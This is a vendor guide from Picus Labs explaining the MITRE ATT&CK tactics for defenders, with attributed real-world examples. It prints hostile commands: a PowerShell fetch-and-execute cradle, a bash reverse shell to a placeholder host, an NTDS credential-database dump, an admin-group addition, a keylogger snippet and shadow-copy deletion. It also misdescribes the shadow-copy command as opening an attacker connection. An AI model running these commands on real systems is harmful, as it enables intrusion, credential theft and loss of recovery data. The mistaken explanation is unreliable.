Picus Labs | 23 MIN READ

LAST UPDATED ON NOVEMBER 05, 2025

What Is MITRE ATT&CK?

Why MITRE ATT&CK Matters in Modern Cybersecurity

The MITRE ATT&CK framework matters in modern cybersecurity because it offers a behavior-based, real-world model of adversary tactics and techniques, allowing security teams to map, detect and prioritise defences across the attack lifecycle.

Scope & Audience of This Guide

This guide is designed for cybersecurity professionals, threat hunters, red and blue teams, and security leaders seeking to operationalize the MITRE ATT&CK framework. It covers how to map adversary behaviors, assess detection coverage, and validate defensive controls using ATT&CK matrices across enterprise to enhance threat-informed defense strategies.

Understanding the MITRE ATT&CK Framework

Definition & Purpose (Living Knowledge Base of TTPs)

The MITRE ATT&CK framework is a living, open-source knowledge base that documents real-world adversary tactics, techniques, and procedures (TTPs). It focuses on how attackers behave, not just the indicators they leave behind. Thus, it provides a universal language to describe, detect, and validate adversarial actions.

  • Behavioral Focus: Moves beyond static indicators (IPs, hashes) to capture real attacker behaviors.

  • Structured Framework: Maps every adversary action to tactics, techniques, and sub-techniques.

  • Cross-Environment Use: Applicable across enterprise, mobile, and cloud ecosystems.

  • Operational Value: Helps teams identify coverage gaps, improve detection, and validate security controls.

  • Collaborative Foundation: Continuously updated through global community and incident research.

In essence, MITRE ATT&CK enables organizations to transition from reactive to evidence-based defense, aligning intelligence, validation, and detection efforts under a shared behavioral model.

History & Development

The MITRE ATT&CK framework was created to organize real-world adversary behavior into a structured, accessible model. It transformed threat knowledge from fragmented data into actionable intelligence used globally for defense and validation.

MITRE’s Origins & Mission

Founded in 1958, MITRE is a not-for-profit organization operating U.S. federally funded research and development centers (FFRDCs). Its mission is to advance public interest through innovation in defense and cybersecurity by building frameworks that enhance collective resilience.

  • Develops open, community-driven models like ATT&CK to standardize threat understanding.

  • Bridges public and private sectors to improve cyber preparedness and coordination.

Framework Creation in 2013 & Public Release in 2015

ATT&CK was developed in 2013 during MITRE’s adversary emulation research.

  • Purpose: To describe attacker behavior beyond static indicators.

  • Public Launch: Released in 2015, quickly becoming a global reference for mapping tactics, techniques, and procedures (TTPs).
    Today, ATT&CK is widely used for threat intelligence, detection engineering, and validation, forming the foundation for behavior-based cybersecurity programs worldwide.

Core Components 

The MITRE ATT&CK framework is built around structured layers that describe how adversaries plan, execute, and refine their attacks. This organization helps defenders visualize attack progressions, identify detection gaps, and strengthen mitigation strategies.

Tactics vs. Techniques vs. Sub-Techniques

  • Tactics represent the why, the adversary’s overarching goal or intent during an attack, such as gaining initial access, establishing persistence, or exfiltrating data.

  • Techniques describe the how, the specific methods used to achieve those goals, like phishing, credential dumping, or lateral movement.

  • Sub-Techniques add detail to the how, breaking techniques into precise variations (e.g., spearphishing attachments vs. spearphishing links).

This hierarchical model gives defenders a clear, consistent way to map attacks, simulate adversary behavior, and design targeted detection and response measures across multiple environments.

Common Knowledge and Community Contributions 

Each technique in ATT&CK is backed by Common Knowledge, documented real-world evidence from threat reports, incident analyses, and malware research. These references ensure ATT&CK reflects verified adversary behavior, not theory.

The framework’s strength lies in community collaboration. Security researchers, vendors, and analysts worldwide contribute new findings, mappings, and updates. This ongoing participation keeps ATT&CK a living, evolving knowledge base, continuously aligning defense strategies with real attacker tradecraft.

ATT&CK Tactics (14 Enterprise Tactics)

Reconnaissance 

  • The Reconnaissance tactic (ID TA0043) in the Enterprise matrix contains 10 techniques.

  • These techniques cover both active and passive information gathering, for example, scanning IP spaces, harvesting identities, searching open/closed sources, etc.

Real-life Example for Recon (2025)

A joint cybersecurity advisory for Western logistics and tech firms detailed how APT28 (Russia’s GRU Unit 26165) conducted reconnaissance.

Specifically, the advisory states:

“The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management.” U.S. Department of War

  • T1589.002 Gather Victim Identity: Information – Email Addresses. Contact-information reconnaissance to identify additional targets in key positions. 

  • T1591 Gather Victim Org Information. Reconnaissance of the cybersecurity department, individuals responsible for coordinating transport, and business relationships of the victim entity. 

  • T1592 Gather Victim Host Information. Attempt to enumerate RTSP servers hosting IP cameras (i.e., reconnaissance of hosts) near border crossings, etc.

For defenders this means reconnaissance should be seen as an early warning phase: detecting unusual enumeration of key roles/devices, scanning of camera infrastructure or ICS-linked hosts, or contact-tracing of roles in logistics chains.

Resource Development

  • The Resource Development tactic (ID TA0042) in the Enterprise matrix consists of 8 main techniques.

  • These techniques involve adversaries establishing or acquiring resources, infrastructure, accounts, tools, services, or capabilities, that support later stages of intrusion and operations.

Real-life Example for Malvertising (2025)

Figure 1. Malvertising Example on Google Search

  • The actor registered and configured multiple fake macOS help domains (mac-safer[.]com, rescue-mac[.]com, etc.) to host SHAMOS payloads, a clear example of adversary-owned delivery infrastructure.

  • These domains spoofed legitimate Apple support pages, using DNS and TLS setup to make phishing and malvertising pages appear authentic.

  • Redundant domain infrastructure ensured continuity even if one site was flagged or taken down, reflecting planned resource provisioning and rotation.

  • The domains were linked to Google Ads accounts, weaponizing legitimate ad networks to route users into attacker-controlled infrastructure at scale.

Defenders should monitor for signals of infrastructure acquisition or malvertising campaigns, like new domains, ad-campaigns redirecting to payloads, unusual service-provisioning, as an early-stage readiness indicator rather than only focusing on post-compromise detection.

Initial Access

  • The Initial Access tactic (ID TA0001) in the Enterprise matrix consists of 11 main techniques.

  • These techniques describe how adversaries gain a foothold in a network, for example, via phishing, drive-by compromise, supply chain tampering, or exploitation of public-facing applications.

Real-life Example for Phishing and File Delivery (Chaos Bot, 2025)

Our recent analysis detailed how the Rust-based ChaosBot malware gained initial access through phishing campaigns that delivered disguised shortcut files.

  • The ChaosBot malware used Discord-hosted malicious files disguised as legitimate utilities to lure victims into downloading and executing the initial payload.

  • Attackers shared compressed ZIP files or executables through public channels, exploiting trust in social platforms for distribution.

  • Once executed, the payload connected to a Discord C2 endpoint, marking the first stage of system compromise (a.k.a initial access).

Defenders should monitor for downloads or execution of binaries from chat platforms, anomalous file origins, and Discord webhook connections as early indicators of phishing-based Initial Access.

Execution

  • The Execution tactic (ID TA0002) in the Enterprise matrix consists of 16 main techniques.

  • These techniques describe how adversaries run adversary-controlled code on local or remote systems, for example via command & scripting interpreters (PowerShell, cmd, Unix shells), scheduled tasks/jobs, exploitation of client applications, user-driven actions (malicious files/links), container or serverless deployments, cloud/ESXi admin commands, shared modules/DLLs, native OS APIs, and inter-process/input injection.

Real-life Example for Execution (Black Basta)

For example, in February 2024, the Black Basta ransomware group employed this method after exploiting vulnerabilities in ConnectWise ScreenConnect to gain initial access to their targets. Once inside, they leveraged PowerShell to successfully download and execute malicious payloads, showcasing their reliance on advanced scripting techniques for infiltration. 

One specific command observed during these attacks was:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://159[.]65[.]130[.]146:4444/a'))"

This command starts with powershell.exe to invoke the tool, followed by -nop to disable profile loading and -w hidden to hide the execution window, enhancing stealth. The core part, IEX ((new-object net.webclient).downloadstring('hxxp://<ip-address>:4444/a')), creates a WebClient object to fetch a script from the given URL and immediately executes it using Invoke-Expression (IEX). This method effectively combines remote payload delivery and execution, exploiting PowerShell's capabilities for initial access while bypassing detection.

Persistence

  • The Persistence tactic (ID TA0003) in the Enterprise matrix consists of 23 main techniques.

  • These techniques describe how adversaries maintain a foothold across restarts, credential changes, and other interruptions, for example by creating or manipulating accounts, adding startup items or Registry run keys, scheduling tasks or abusing BITS jobs, hijacking execution flow (DLL/loader hijacks), installing services/drivers or firmware implants, adding SSH authorized keys, abusing valid/default accounts, or adding cloud roles/device registrations to keep access alive.

Real-life Example for Persistence (Earth Estries, a.k.a Salt Typhoon)

In November 2024, researchers identified that the Earth Estries (a.k.a Salt Typhoon) threat group employs advanced techniques to maintain persistence in compromised systems. One such technique involved using a command to create a malicious Windows service through the Service Control (sc) tool. This command was discovered during an investigation into the group's tactics, particularly their method of deploying and sustaining malware persistence. 

The specific command they used was:

sc create pasrv binpath= "cmd /c \"start msiexec.exe /y C:\Windows\PLA\Performance[.]dll\"" start= auto displayname= "Microsoft Performance Alerts Server"

Privilege Escalation

  • The Privilege Escalation tactic (ID TA0004) in the Enterprise matrix consists of 14 main techniques.

  • These techniques describe how adversaries gain higher-level permissions on a system or network, for example by abusing elevation control mechanisms (UAC, sudo), manipulating access tokens, exploiting software/OS vulnerabilities, using valid/default accounts, or abusing boot/logon/autostart mechanisms and temporary elevated cloud roles.

Real-life Example for Privilege Escalation (BianLian Ransomware)

In November 2024, the BianLian ransomware group demonstrated this tactic by exploiting a Windows vulnerability (CVE-2022-37969) to elevate privileges on targeted systems.

The BianLian actors utilized the Windows Command Shell to execute the command, which added a specified user to the local administrators group, thereby granting them administrative privileges.

cmd.exe /c net localgroup administrators <username> /add

This method enabled the attackers to escalate their privileges within the compromised environment, allowing them to expand their capabilities and perform further malicious activities, such as data exfiltration, establishing persistence, and deploying ransomware.

Defense Evasion

  • The Defense Evasion tactic (ID TA0005) in the Enterprise matrix consists of 45 main techniques.

  • These techniques describe how adversaries avoid detection and frustrate defensive tools and processes, for example by obfuscating or encrypting code and data, abusing trusted or signed binaries (living-off-the-land), disabling or tampering with security tools, removing artifacts and indicators, timestomping files, using kernel or firmware rootkits, masquerading as legitimate services/processes, and hiding communications or payloads through encoding/packing and protocol misuse.

Real-life Example for Defense Evasion (Rhysida Ransomware)

For example, in February 2024, the Rhysida ransomware group employed an encoded PowerShell command manipulate Windows settings covertly.

powershell.exe -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

When decoded, it translates to:

start-process -WindowStyle Hidden gpupdate.exe /force

This command leverages PowerShell to run gpupdate.exe in a hidden window, forcing Group Policy updates to modify or disable security configurations.

By exploiting trusted system tools and employing hidden, encoded commands, attackers can evade detection and facilitate ransomware execution. This approach exemplifies the sophisticated use of native utilities to bypass traditional monitoring systems.

Credential Access

  • The Credential Access tactic (ID TA0006) in the Enterprise matrix consists of 17 main techniques

  • These techniques describe how adversaries steal account names and authentication material, for example via credential dumping (LSASS/NTDS), brute force and password-spraying, credential stuffing, keylogging/input capture, network sniffing and AiTM attacks, stealing or forging authentication certificates/tokens, extracting credentials from browsers/password managers/cloud secret stores, and forcing or exploiting authentication to capture credentials.

Real-life Example for Credential Access (Iranian Cyber Actors)

To give a solid example, in October 2024, CISA observed Iranian cyber actors using the ntdsutil.exe command to extract the NTDS.dit file, a critical component of Active Directory containing user credentials.

ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp\ntds" q q

This command is particularly sensitive from a security perspective as it creates a copy of the entire Active Directory database, which contains all domain objects including user accounts, computer accounts, and most critically, password hashes. In malicious contexts, attackers often use this technique to exfiltrate domain credentials since the backed-up ntds.dit file can be processed offline to extract password hashes for every domain user. This type of attack is especially dangerous because it provides persistent access to the domain even if passwords are later changed, as historical password hashes are also stored in the database.

Discovery

  • The Discovery tactic (ID TA0007) in the Enterprise matrix consists of 33 main techniques

  • These techniques describe how adversaries gather information about systems, network topology, accounts, and security posture to plan follow-on actions, for example: system and network configuration discovery, service and process enumeration, account and credential discovery, file/directory inspection, software and hardware inventory, network scanning and DNS enumeration, and discovery of security tools or cloud resources.

Real-life Example for Discovery (BianLian Ransomware)

In November 2024, the BianLian ransomware group exemplified this tactic by employing Windows Command Shell commands to gather detailed information about domain users and groups, facilitating credential access and enabling lateral movement within victim networks.

findstr /spin "password" *.* > C:\Users\training\Music\<file>.txt

This command searches for the term "password" in all files within the current directory and subdirectories, redirecting the results to a specified file. This helps attackers locate plaintext passwords stored in files.

Search for Domain Group Information:

# Retrieve all domain groups 

net group /domain 

# List accounts in 'Domain Admins' group 

net group "Domain Admins" /domain 

# List accounts in 'Domain Computers' 

group net group "Domain Computers" /domain 

# List all domain users 

net user /domain

Lateral Movement

  • The Lateral Movement tactic (ID TA0008) in the Enterprise matrix consists of 9 main techniques

  • These techniques describe how adversaries move through a network to reach additional systems and resources after initial compromise, for example by abusing remote services (RDP/SMB/SSH), leveraging valid or stolen credentials (pass-the-hash / pass-the-ticket), hijacking remote sessions, copying tools or payloads to other hosts (PsExec/remote file copy), exploiting remote-service vulnerabilities, or chaining other techniques (discovery + credential access) to pivot toward high-value targets.

Real-life Example for Lateral Movement (Everest Ransomware)

In August 2024, the Everest ransomware group utilized PowerShell's Invoke-Command cmdlet to execute commands on remote systems

# Execute a remote command on a target system
Invoke-Command -ComputerName <TargetComputer> -ScriptBlock { <Command> } -Credential <UserCredential>

The command specifies the target system using the -ComputerName parameter, while the -ScriptBlock parameter defines the script or command to be executed remotely. The -Credential parameter provides the necessary authentication, often using stolen or compromised credentials, to access the target system with appropriate privileges. This method allows attackers to perform tasks such as executing malicious scripts, altering configurations, or deploying additional payloads on remote machines.

Collection

  • The Collection tactic (ID TA0009) in the Enterprise matrix consists of 17 main techniques.

  • These techniques describe how adversaries gather and accumulate data of interest to their objectives, for example by copying files from local drives and network shares, capturing screenshots and audio/video, keylogging and clipboard capture, harvesting browser or mail client data, querying databases or cloud storage, collecting from removable media, and aggregating data for later exfiltration or reuse.

Real-life Example for Collection (CarnavalHeist)

Collection is one of the main activities carried out by malware like CarnavalHeist to gather sensitive information from victims. Reported in May 2024, the provided script showcases how CarnavalHeist implements two critical functions for data collection: screen capturing and keylogging.

from PIL import ImageGrab
import keyboard

def capture_screen():
    screenshot = ImageGrab.grab()
    screenshot.save("C:\\Users\\Public\\screenshot.png")

def log_keys():
    keyboard.start_recording()
    with open("C:\\Users\\Public\\keystrokes.log", "w") as f:
        for event in keyboard.record("esc"):
            f.write(f"{event.name}\n")

The script captures each keypress until the user presses the escape key (esc), making it possible for attackers to harvest sensitive data like passwords, PINs, or other typed credentials. Together, these functions allow CarnavalHeist to effectively gather critical information from compromised systems, aiding its primary goal of financial theft through precise credential and session monitoring.

Exfiltration 

  • The Exfiltration tactic (ID TA0010) in the Enterprise matrix consists of 9 main techniques.

  • These techniques describe how adversaries remove or transmit collected data out of a target environment, for example by sending data over their command-and-control channel, using alternative network protocols or web/cloud services, exporting to removable or physical media, emailing data out, or staging and compressing/encrypting files to avoid detection prior to transfer.

Impact

  • The Impact tactic (ID TA0040) in the Enterprise matrix consists of 15 main techniques

  • These techniques describe how adversaries manipulate, interrupt, or destroy systems and data to achieve their goals, for example by encrypting or destroying data (ransomware/data destruction), manipulating stored/transmitted/runtime data, wiping disks or corrupting firmware, stopping services or shutting down systems, defacing internal or external sites, performing network or endpoint DoS, hijacking resources for compute/bandwidth abuse, or preventing system recovery.

Real-life Example for Impact (Akira Ransomware)

In May 2024, the Akira ransomware group exemplified this by using a PowerShell command to delete Volume Shadow Copies, a critical Windows feature for data recovery.

The command employed was:

# Delete Volume Shadow Copies to hinder data recovery
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"

This command establishes a socket connection from the compromised host to the attacker's server, enabling the transmission of commands and data.

Techniques, and Sub-Techniques Explained

Anatomy of a Technique Record

A technique record is a discrete entry in the ATT&CK knowledge base that describes how an adversary achieves a tactical goal.

It sits under a Tactic (the adversary’s goal) and may include Sub-Techniques (more specific variants).

Metadata

Metadata is the key contextual and identifying information tied to a specific ATT&CK technique record, enabling security teams to categorise, track, and implement detection and mitigation for that adversary behaviour.

Key metadata items typically include:

  • Unique Identifier (e.g., “T1059”) 

  • Name of the technique (e.g., “Command and Scripting Interpreter”) 

  • Description of what the technique is and how it is used 

  • Platforms or environments applicable (e.g., Windows, Linux, Cloud) 

  • Data Sources relevant for detection (e.g., process logs, API calls) 

  • Mitigations associated with the technique (defensive controls) 

  • References to documented adversary usage (groups/software) 

  • Versioning and release information for the technique object (e.g., revision history)

Description

The description section provides a clear and concise narrative of the technique,  what the adversary does, why they use that method, and how it fits into the attack lifecycle.

Example:

For technique T1059: Adversaries may abuse command and scripting interpreters (such as PowerShell, Bash, Python) to execute commands or scripts on a host because these tools are built-in, trusted, and provide a broad range of functionality.

Sub-Technique

A sub-technique is a more specific variant of a technique, providing deeper granularity on how the technique can be executed.

For instance, under “Command and Scripting Interpreter (T1059)” you might have sub-techniques like:

  • T1059.001 – PowerShell

  • T1059.002 – AppleScript 

  • T1059.003 – Windows Command Shell 

  • T1059.004 – Unix Shell 

  • T1059.005 – Visual Basic 

  • T1059.006 – Python 

  • T1059.007 – JavaScript 

  • T1059.008 – Network Device CLI 

  • T1059.009 – Cloud API 

  • T1059.010 – AutoHotKey & AutoIT 

  • T1059.011 – Lua 

  • T1059.012 – Hypervisor CLI

Procedure Examples

Procedure examples illustrate real-world or simulated instances of an adversary executing the technique or sub-technique, including commands, tools utilised, and sequences of actions, helping defenders recognise similar patterns.

Bulleted examples:

  • Using powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('<URL>'))" to fetch and execute a remote payload.
  • On Unix: bash -i >& /dev/tcp/attacker/4444 0>&1 to establish a reverse shell.

Mitigations

Mitigations are the set of defensive controls, policies, and procedures that organisations can implement to reduce the likelihood or impact of a technique being successfully used by an adversary.

Examples:

  • Disable or restrict the use of scripting interpreters like PowerShell for non-administrative users.

  • Monitor and restrict scheduled task creation, disable unnecessary LLMNR/NBT-NS.

  • Enforce least-privilege, audit and limit remote service execution (SMB/RPC).

Detections

Detections are the signals, telemetry sources, log events and analytical approaches that security teams use to identify when a specific technique or sub-technique is being executed within their environment.

Elements include:

  • Data sources to monitor (e.g., process creation logs, command-line arguments, API call traces).

  • Indicators or anomalies associated with the technique (e.g., execution of cmd.exe /c from unexpected parent process, creation of reverse shell network connections).

  • Contextual correlation (e.g., unusual use of scheduled task creation following an account login from a remote IP).

  • Hunting focus (e.g., search for powershell -nop -w hidden or suspicious parent-child process relationships).

Threat Groups & Software Catalog

Adversary Groups Overview

A threat group in the MITRE ATT&CK framework is a named adversary or cluster of adversarial behaviour (often nation-state or criminal) whose observed actions, tools, and techniques are documented for tracking and defence.

Key points:

The Groups directory on ATT&CK lists many known adversaries, each with a profile of tactics, techniques and associated software. These groups represent recurring patterns of attack behaviour, attribution and victim-sets.

  • APT29 (ID G0016) is a threat group attributed to Russia’s Foreign Intelligence Service (SVR).
  • APT33 (ID G0064) is a suspected Iranian group active since at least 2013, targeting aviation & energy sectors.

Software Used by Adversaries

Software entries in the MITRE ATT&CK catalog are tools, malware, legitimate utilities or frameworks that adversaries use to execute techniques, documented to map how attacks occur and how to defend them.

Key points:

  • The Software directory on ATT&CK lists many adversary-used items, their attributes and linked techniques. 

  • Software may include custom malware, commercial-off-the-shelf tools, open-source utilities or living-off-the-land binaries. 
    Example:

  • AADInternals is a PowerShell-based framework for enumerating and exploiting Azure AD, publicly available on GitHub. 

  • Ruler is a tool used to abuse Microsoft Exchange services and is listed in the catalog.

Applications & Operational Use Cases

Simulating Attack Scenarios & Adversary Emulation

Simulating attack scenarios and adversary emulation means using the MITRE ATT&CK framework to model how real-world threat actors operate, by chaining tactics, techniques and procedures, and then executing those simulations in a safe environment to test, validate and improve an organisation’s defensive posture.

How It Works

At Picus Security, we continuously translate emerging adversary campaigns into actionable simulation content. Each new threat, such as the Cavalry Werewolf APT campaign, is broken down into ATT&CK-mapped techniques that mirror how the group achieves initial access, persistence, execution, and command-and-control.

By safely emulating these behaviours across network, endpoint, email, and cloud vectors, the Picus Security Validation Platform enables defenders to:

  • Assess how current prevention and detection layer controls (NGFW, WAF, IPS/IDS, EDR, XDR, AV, SIEM, etc.,) respond to the same techniques used by active adversaries.

  • Identify unprotected attack paths and coverage gaps before real intrusions occur.

  • Validate whether new detection rules and signatures effectively stop known and evolving malware variants.

Example

In our Cavalry Werewolf APT analysis, we examined how the group deployed FoalShell and StallionRAT through targeted spear-phishing campaigns.

Figure 2. Picus Threat Library, FoalShell Backdoor Malware Attack Simulation

Picus simulated the complete intrusion chain, from the initial lure and archive execution to the malware’s PowerShell-based persistence and Telegram-controlled C2 communication.

These adversary emulations revealed where endpoint and email security layers blocked malicious payloads and where detection logic required fine-tuning. By replicating each stage of the attack safely, Picus allowed defenders to observe real adversary behaviours without risk, turning threat intelligence into measurable validation data.

MITRE ATT&CK vs. Cyber Kill Chain

Cyber Kill Chain (Lockheed Martin)

  • Describes a linear sequence of seven stages that outline the lifecycle of a cyberattack.

  • Stages include Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on Objectives.

  • Designed for strategic visibility, showing how to interrupt attacks early by “breaking the chain.”

  • Focuses on external intrusions and malware-driven threats.

  • Most effective for high-level defense planning, awareness training, and mapping security investments.

  • Limitation: assumes attacks follow a fixed order, which doesn’t reflect modern, multi-vector campaigns.

MITRE ATT&CK Framework

  • A tactical, behavior-based framework built from real-world adversary observations.

  • Organizes adversary behavior into Tactics (the “why”) and Techniques (the “how”), with deeper Sub-Techniques for precision.

  • Covers the entire attack lifecycle, including post-exploitation stages like Lateral Movement, Persistence, and Exfiltration.

  • Continuously updated and mapped to known threat groups, software, and detection data sources.

  • Enables red, blue, and purple teams to simulate, detect, and validate adversary behavior.

  • Best suited for detection engineering, threat hunting, and Breach and Attack Simulation (BAS).

Key Differences

  • Perspective: Cyber Kill Chain is strategic; MITRE ATT&CK is tactical and operational.

  • Structure: Kill Chain is linear; ATT&CK is non-linear and dynamic.

  • Detail Level: Kill Chain provides a broad view; ATT&CK provides technique-level granularity.

  • Purpose: Kill Chain supports attack lifecycle awareness; ATT&CK supports defense validation and continuous improvement.

How They Work Together

  • The Cyber Kill Chain defines the overall attack path, ideal for communicating strategy and identifying defensive choke points.

  • MITRE ATT&CK details every step along that path, mapping exact behaviors to test, detect, and mitigate.

  • Combined, they form a complete defense model: the Kill Chain gives structure, and ATT&CK turns it into measurable, actionable validation.

Key Takeaways

  • MITRE ATT&CK is the global standard for mapping adversary behavior.
    It transforms real-world threat intelligence into a structured, living knowledge base of tactics, techniques, and procedures (TTPs), enabling defenders to think like attackers.

  • Behavior-based defense replaces indicator-based detection.
    Unlike static IoCs such as IPs or hashes, ATT&CK focuses on how adversaries act, helping organizations detect and mitigate evolving threats even when signatures change.

  • A shared language for security teams.
    ATT&CK provides a universal model that aligns red, blue, and purple teams, ensuring threat intelligence, validation, and detection engineering work from the same behavioral foundation.

  • Operational value through validation and coverage mapping.
    By mapping detections, rules, and alerts to ATT&CK, teams can identify gaps, measure detection coverage, and prioritize mitigations that directly address exploitable weaknesses.

  • Community-driven and continuously updated.
    The framework grows through real incident research and global collaboration, ensuring relevance to emerging adversary techniques, new platforms, and evolving attacker tradecraft.

  • Adopted across industries for measurable security performance.
    From threat hunting to Breach and Attack Simulation (BAS), ATT&CK serves as the foundation for evidence-based defense, enabling continuous improvement through testable, repeatable validation.

  • Complementary to the Cyber Kill Chain.
    While the Kill Chain defines the attack lifecycle, MITRE ATT&CK provides the technical depth, detailing each adversary action along that chain for proactive detection and response.

  • Empowering defenders with adversary emulation.
    Platforms like Picus Security operationalize ATT&CK by simulating real-world attacks mapped to adversary TTPs, turning threat intelligence into actionable validation data.

Frequently Asked Questions (FAQs)

Here are the most asked questions about MITRE ATT&CK

What is the MITRE ATT&CK Framework?

The MITRE ATT&CK Framework is a globally accessible knowledge base that systematically defines and organizes tactics, techniques, and procedures (TTPs) observed in real-world adversary operations. It serves as a common language for security teams to describe TTPs.

How does the MITRE ATT&CK Framework categorize software?

In the MITRE ATT&CK Framework, software is categorized into malware and tools. Malware includes commercial, custom closed-source, or open-source software used for malicious purposes, while tools include software that can be used for both defensive and offensive purposes, such as penetration testing.

What is the Pyramid of Pain in cybersecurity?

The Pyramid of Pain is a classification system introduced by David J Bianco that illustrates the value of different types of Indicators of Compromise (IoCs) in cybersecurity. As you move up the pyramid, it becomes more difficult for adversaries to replace indicators, but also more challenging for defenders to detect and apply them.

What are the main components of the ATT&CK Matrix for Enterprise?

The ATT&CK Matrix for Enterprise consists of tactics, techniques, and sub-techniques. Each column in the matrix represents a tactic, while techniques describe the methods adversaries use to achieve these tactics.

How often is the MITRE ATT&CK Framework updated?

According to the FAQ from MITRE, the framework is updated bi-annually. The version history shows major releases around April and October each year (for example: v14.1 in October 2023 → April 2024; v15.1 in April 2024 → October 2024).

Table of Contents

Discover More Resources